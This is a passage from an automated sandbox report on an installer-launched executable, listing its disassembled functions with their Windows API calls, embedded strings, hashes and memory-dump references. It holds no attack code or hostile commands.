                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue$ErrorFreeHeapLast
                                                                                          • String ID: Error %d getting %s
                                                                                          • API String ID: 3552358119-2709163689
                                                                                          • Opcode ID: bc6ae68bc78e2b2a80ee470c143d272d2cbda763a1d9b48ec71bb780e3e761e4
                                                                                          • Instruction ID: b1d3680e66246909f4800477e639e3bfbf7beafcfbdc2e876098fc79bfaa41a3
                                                                                          • Opcode Fuzzy Hash: bc6ae68bc78e2b2a80ee470c143d272d2cbda763a1d9b48ec71bb780e3e761e4
                                                                                          • Instruction Fuzzy Hash: C9318671D001289BDB64DB18CC85BEEBBB9BF85300F04C5E9E489A7241DE706E858FE1
                                                                                          Function 005E2470 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetUserNameW.ADVAPI32(?,005BF6B1), ref: 005E24D9
                                                                                            • Part of subcall function 005E1500: LoadLibraryW.KERNEL32(ADVAPI32.DLL,00000105,005E24EA), ref: 005E150E
                                                                                            • Part of subcall function 005E1D50: GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 005E1E3C
                                                                                            • Part of subcall function 005E1D50: GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?,00000000), ref: 005E1EB2
                                                                                            • Part of subcall function 005E1D50: GetLastError.KERNEL32(?,?,00000000), ref: 005E1EBC
                                                                                            • Part of subcall function 005E1D50: GetLengthSid.ADVAPI32(?,?,?,00000000), ref: 005E1ED7
                                                                                            • Part of subcall function 005E1D50: GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 005E1EEB
                                                                                            • Part of subcall function 005E1D50: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 005E1EF2
                                                                                            • Part of subcall function 005E1D50: InitializeAcl.ADVAPI32(00000000,?,00000002,?,?,00000000), ref: 005E1EFE
                                                                                            • Part of subcall function 005E1D50: GetLastError.KERNEL32(?,?,00000000), ref: 005E1F08
                                                                                            • Part of subcall function 005E1D50: GetAce.ADVAPI32(?,00000000,?,?,?,00000000), ref: 005E1F49
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorHeapLast$AddressAllocInformationInitializeLengthLibraryLoadNameProcProcessUser
                                                                                          • String ID: |]b$|]b
                                                                                          • API String ID: 810456405-995414037
                                                                                          • Opcode ID: ee60e52f97e496439aa583889ab10376e5eae78cc20991261269b1a9c99e6c70
                                                                                          • Instruction ID: 1d1b2c715b063b082bb4ea1f3ac511ad413a13716604afecd5550117cfe90512
                                                                                          • Opcode Fuzzy Hash: ee60e52f97e496439aa583889ab10376e5eae78cc20991261269b1a9c99e6c70
                                                                                          • Instruction Fuzzy Hash: 9E417372C01569AACB28EBA4DD49BDEB7B8BF58310F0441D9E94AA7141EB306F44CF90
                                                                                          Function 005F43A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005F92EA: EnterCriticalSection.KERNEL32(?,?,?,005F2AA8,0000000D,?,005B97EE,00000000,?,?), ref: 005F9314
                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0,006333F0,00000010,005E9517,00632EE8,0000000C,005E9595,?,005B06CD,00000040,?,005B06CD,?,0061DD1C), ref: 005F445D
                                                                                          • EnterCriticalSection.KERNEL32(?,?,005B06CD,?,0061DD1C), ref: 005F4486
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Enter$CountInitializeSpin
                                                                                          • String ID: /O
                                                                                          • API String ID: 3238990206-273608944
                                                                                          • Opcode ID: 9fc074e91a32a395695fb395a4daf444071f5e14d0443416483acf47fa60b2d1
                                                                                          • Instruction ID: 3c85083b08f22d8627e97ca621629da77fb837517ff4b0174b2e39b9ad7fc3c3
                                                                                          • Opcode Fuzzy Hash: 9fc074e91a32a395695fb395a4daf444071f5e14d0443416483acf47fa60b2d1
                                                                                          • Instruction Fuzzy Hash: E231D23950065A9FCB10DFA9D889B2EBFB1FF49314B548119E285A72A1CB38E902CF50
                                                                                          Function 0059B110 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005999A0: GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005999C2
                                                                                            • Part of subcall function 005999A0: LoadLibraryW.KERNEL32(?), ref: 00599A06
                                                                                            • Part of subcall function 005999A0: GetProcAddress.KERNEL32(?,WdfPreDeviceInstall), ref: 00599A20
                                                                                            • Part of subcall function 005999A0: GetProcAddress.KERNEL32(00000000,WdfPostDeviceInstall), ref: 00599A2D
                                                                                            • Part of subcall function 005999A0: GetProcAddress.KERNEL32(?,WdfPreDeviceRemove), ref: 00599A3A
                                                                                            • Part of subcall function 005999A0: GetProcAddress.KERNEL32(?,WdfPostDeviceRemove), ref: 00599A47
                                                                                            • Part of subcall function 005999A0: FreeLibrary.KERNEL32(00000000,?,WdfPostDeviceRemove,?,WdfPreDeviceRemove,?,WdfPreDeviceInstall), ref: 00599A69
                                                                                            • Part of subcall function 00599BE0: wvsprintfW.USER32(?,?,?), ref: 00599C0B
                                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 0059B1B7
                                                                                          Strings
                                                                                          • Error. predeviceInstall failed, e=%d, xrefs: 0059B180
                                                                                          • Error loading wdfCoInstaller, xrefs: 0059B147
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$Library$CloseCurrentDirectoryFreeHandleLoadServicewvsprintf
                                                                                          • String ID: Error loading wdfCoInstaller$Error. predeviceInstall failed, e=%d
                                                                                          • API String ID: 266337823-2211093675
                                                                                          • Opcode ID: 7883fb2dfc886fba775417eb9a0c23c29cab439baf00410ccb6841564abee67a
                                                                                          • Instruction ID: 86fc8f2def4eca50db7e9a30d9eebe3305e05d8ec08fec151dc39d205df10889
                                                                                          • Opcode Fuzzy Hash: 7883fb2dfc886fba775417eb9a0c23c29cab439baf00410ccb6841564abee67a
                                                                                          • Instruction Fuzzy Hash: CC219271B056095BEB14EBB5AD6AABF77A9AF84700F04415EE80A83281EF65DA00C6D1
                                                                                          Function 005C8DB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005C8DD7
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C8E1E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                          • String ID: :
                                                                                          • API String ID: 2034136378-336475711
                                                                                          • Opcode ID: 17dc2eb56db30246eb89c4718d9ff0ef821f407767a9d4e5329f487016cbf052
                                                                                          • Instruction ID: d0c744f9a53a1a53cead590d14748dcc766e31dafad05c62a931e99d8286d813
                                                                                          • Opcode Fuzzy Hash: 17dc2eb56db30246eb89c4718d9ff0ef821f407767a9d4e5329f487016cbf052
                                                                                          • Instruction Fuzzy Hash: F321D6749002199ECB24EBA4CC0AFFA7B78FF84304F448599E60957291EF745B84CBA5
                                                                                          Function 005FA5FF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSIF373.tmp,00000104), ref: 005FA61F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileModuleName
                                                                                          • String ID: C:\Windows\Installer\MSIF373.tmp$`4d
                                                                                          • API String ID: 514040917-4039923104
                                                                                          • Opcode ID: bb48bfea3620c48ce55f5e9ba3d2b16ed7951e0e7e58ff9b809d70e35cded293
                                                                                          • Instruction ID: 35899dfb50af1b77b553600e3547fbf060ebdd4a3d47e03824f5cd7d911ed886
                                                                                          • Opcode Fuzzy Hash: bb48bfea3620c48ce55f5e9ba3d2b16ed7951e0e7e58ff9b809d70e35cded293
                                                                                          • Instruction Fuzzy Hash: 8E1196B6A0021DAF9B14DFA4ECC48BE7BEDFB45334738052AF615D3294EA349A058752
                                                                                          Function 005B4A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(00020019,?,00000000,DE64E134,00000000,00020019,?,00000000), ref: 005B4A70
                                                                                            • Part of subcall function 005B4640: wvsprintfW.USER32(?,00596384,?), ref: 005B466B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValuewvsprintf
                                                                                          • String ID: ($Error %d getting %s
                                                                                          • API String ID: 141982866-3697087921
                                                                                          • Opcode ID: cac4099444449e47fb581e0138e6240574b048ce990aefc41755ee4423fd2dfe
                                                                                          • Instruction ID: 27a12d50aff28e46c8fb9772237b6ed81df25711850002afc7cc42c17bfbbdc1
                                                                                          • Opcode Fuzzy Hash: cac4099444449e47fb581e0138e6240574b048ce990aefc41755ee4423fd2dfe
                                                                                          • Instruction Fuzzy Hash: 7E11C672E01108ABDB14EFA9DD46DFFB7B9FB84710F04811AF806A7241DA70A9048BA1
                                                                                          Function 00592010 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: %s.%04d.%s$Client
                                                                                          • API String ID: 2111968516-3365126691
                                                                                          • Opcode ID: 8baae87390b79026482829060fb1fcab26cc6b3b7ceb626870fb6ce8b99af13e
                                                                                          • Instruction ID: ad67d760c53da6c44ace78b2caa9cd3f5e86203070e20f5b10b0eeb817693e06
                                                                                          • Opcode Fuzzy Hash: 8baae87390b79026482829060fb1fcab26cc6b3b7ceb626870fb6ce8b99af13e
                                                                                          • Instruction Fuzzy Hash: B20166B2601201BBEF205A189C4ABB77B6AFF41720F080125FD099B281E3B26C44C3F1
                                                                                          Function 005CC750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 005CC78A
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005CC7C6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileLibraryLoadModuleName
                                                                                          • String ID: NSMTrace.dll
                                                                                          • API String ID: 1159719554-2572706706
                                                                                          • Opcode ID: 0b3a9a17b02c2782a4791be928f284a6c68d154f7d2789603bf89827349c927d
                                                                                          • Instruction ID: 260a212b2dcb441e2adcfd160ba5d795753efe544b1f2da9fee7c28366625e5b
                                                                                          • Opcode Fuzzy Hash: 0b3a9a17b02c2782a4791be928f284a6c68d154f7d2789603bf89827349c927d
                                                                                          • Instruction Fuzzy Hash: 9011E3B5A002169FCB24DFA5DC59EBA7FF9FB44314B00406EF909D7281EB309A018BE0
                                                                                          Function 005AE4C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 005AE4E5
                                                                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 005AE511
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Value$Query
                                                                                          • String ID: %s=%x, e=%d
                                                                                          • API String ID: 4255345937-60135172
                                                                                          • Opcode ID: 69e0a09a3368a41dce7b00cc4421ed01eba9e7ef659d4a67dd2e69dafe5e972a
                                                                                          • Instruction ID: 48ba341ad14ac481f1179dce98443c4aedc3507759d49cf3f8c3279cfb812ac7
                                                                                          • Opcode Fuzzy Hash: 69e0a09a3368a41dce7b00cc4421ed01eba9e7ef659d4a67dd2e69dafe5e972a
                                                                                          • Instruction Fuzzy Hash: 9801B972E10118BBDB20EE94DC09FEF7B7CEB89714F00815AFD0497140E670A90587E1
                                                                                          Function 005B2BF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wvsprintf
                                                                                          • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                          • API String ID: 2795597889-2052047905
                                                                                          • Opcode ID: 9b29ffa711d764c039482e35b71bd35fc95bdff316d6d191b9daaac95b6afe67
                                                                                          • Instruction ID: 73a473ad025797351b029909c82b4b4fa20386bfd6644fe2907d69bc3e24f8dd
                                                                                          • Opcode Fuzzy Hash: 9b29ffa711d764c039482e35b71bd35fc95bdff316d6d191b9daaac95b6afe67
                                                                                          • Instruction Fuzzy Hash: 67F08635A10108A7CB44EFA4DC158EEBBF9FF85700F048159F94697280EE70AE8887D5
                                                                                          Function 005A6016 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005A6047
                                                                                          • VerQueryValueW.VERSION(00000000,?,00000000,?), ref: 005A6062
                                                                                          Strings
                                                                                          • \StringFileInfo\%04x%04x\FileDescription, xrefs: 005A6041
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValuewsprintf
                                                                                          • String ID: \StringFileInfo\%04x%04x\FileDescription
                                                                                          • API String ID: 2072284396-3471089032
                                                                                          • Opcode ID: bb9ff61a9858ab100e4dcb2b0b8b517109e677adb24b09814079622ce122395f
                                                                                          • Instruction ID: f6b52bbd9199e41c823f66a2e70aa837046c4cc3b58f9197a106e352f59b4f60
                                                                                          • Opcode Fuzzy Hash: bb9ff61a9858ab100e4dcb2b0b8b517109e677adb24b09814079622ce122395f
                                                                                          • Instruction Fuzzy Hash: B201F2B590012D9ACB28DB50CC89BFEB3B8FF94304F0440DEE95A56142EA709A84CFA1
                                                                                          Function 005F2A5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00633318,00000008,005F2B66,00000000,00000000,?,005B97EE,00000000,?,?), ref: 005F2A6F
                                                                                            • Part of subcall function 005F92EA: EnterCriticalSection.KERNEL32(?,?,?,005F2AA8,0000000D,?,005B97EE,00000000,?,?), ref: 005F9314
                                                                                          • InterlockedIncrement.KERNEL32(00638D80), ref: 005F2AB0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterHandleIncrementInterlockedModuleSection
                                                                                          • String ID: KERNEL32.DLL
                                                                                          • API String ID: 2650740867-2576044830
                                                                                          • Opcode ID: 7e4f412ab6f6f0099a32e2d80b34d39a40f6745b3069da082dc49d3b363ac33e
                                                                                          • Instruction ID: 46ee2d1c47933f4f8bfd94d5edd8615d7fdc089eff197791425d6db58703637f
                                                                                          • Opcode Fuzzy Hash: 7e4f412ab6f6f0099a32e2d80b34d39a40f6745b3069da082dc49d3b363ac33e
                                                                                          • Instruction Fuzzy Hash: 7C01AD71400B05EBD720AF65D80A799BFE1FF80320F10890EE5D9973A1CBB8AA40CF65
                                                                                          Function 005B2C70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wvsprintf
                                                                                          • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                          • API String ID: 2795597889-2052047905
                                                                                          • Opcode ID: be7ae3ea75e73de7d8c985602f3687d7c5d6dbd479749feb8eef673ef02b97bf
                                                                                          • Instruction ID: b9550da7ee90d3d9629f2395bded6220c1e6770df1a8f3989a22bc265a849358
                                                                                          • Opcode Fuzzy Hash: be7ae3ea75e73de7d8c985602f3687d7c5d6dbd479749feb8eef673ef02b97bf
                                                                                          • Instruction Fuzzy Hash: 00F0A975A14108A7CB44DFA4EC558EEBBF9FF45710F048159F54997180EE709B84C7E1
                                                                                          Function 0059A000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0059A029
                                                                                          • wsprintfW.USER32 ref: 0059A048
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
